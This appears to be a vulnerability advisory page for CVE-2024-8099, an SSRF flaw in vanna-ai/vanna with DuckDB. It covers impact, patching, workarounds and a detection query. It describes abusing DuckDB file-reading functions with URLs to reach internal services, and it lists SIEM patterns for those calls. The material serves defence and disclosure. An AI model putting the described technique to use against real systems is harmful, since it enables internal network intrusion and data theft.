CVE-2024-8099
📋 TL;DR
This SSRF vulnerability in vanna-ai/vanna with DuckDB allows attackers to execute crafted SQL queries that abuse DuckDB's file reading functions to make unauthorized requests to internal or external systems. This can lead to data exfiltration, internal network reconnaissance, and potential further exploitation. All users running vanna-ai/vanna with DuckDB are affected.
💻 Affected Systems
- vanna-ai/vanna
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of internal systems through SSRF chaining, sensitive data exfiltration from internal services, and potential lateral movement within the network.
Likely Case
Unauthorized access to internal HTTP services, metadata services (like AWS/Azure instance metadata), and data exfiltration from accessible internal endpoints.
If Mitigated
Limited impact due to network segmentation, egress filtering, and proper input validation preventing successful exploitation.
🎯 Exploit Status
Exploitation requires ability to submit SQL queries to the vulnerable system. The vulnerability leverages DuckDB's built-in file reading functions.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific version
Vendor Advisory: https://huntr.com/bounties/19b96694-ed52-4ee4-8d2c-6cc7bd09c0ad
Restart Required: No
Instructions:
1. Update vanna-ai/vanna to the latest patched version. 2. Verify DuckDB configuration restricts file reading functions. 3. Test SQL query functionality after update.
🔧 Temporary Workarounds
Restrict DuckDB file functions
allConfigure DuckDB to disable or restrict file reading functions like read_csv, read_text, read_blob
ALTER DATABASE SET disable_file_functions = true;
Input validation and sanitization
allImplement strict input validation to block SQL queries containing file reading functions
🧯 If You Can't Patch
- Implement network segmentation to restrict outbound connections from the vulnerable system
- Deploy web application firewall (WAF) rules to detect and block SSRF patterns in SQL queries
🔍 How to Verify
Check if Vulnerable:
Test if SQL queries containing DuckDB file reading functions (read_csv, read_text, read_blob) with URLs are executed successfullyCheck Version:
Check vanna-ai/vanna version and verify it's patched per vendor advisoryVerify Fix Applied:
Attempt to execute SSRF payloads using DuckDB file functions and verify they are blocked or fail📡 Detection & Monitoring
Log Indicators:
- SQL queries containing read_csv, read_text, or read_blob with URL patterns
- Outbound HTTP requests from database process to unusual destinations
Network Indicators:
- Database process making HTTP requests to internal or external endpoints
- Unusual outbound traffic patterns from database server
SIEM Query:
source="vanna_logs" AND ("read_csv" OR "read_text" OR "read_blob") AND ("http://" OR "https://" OR "file://")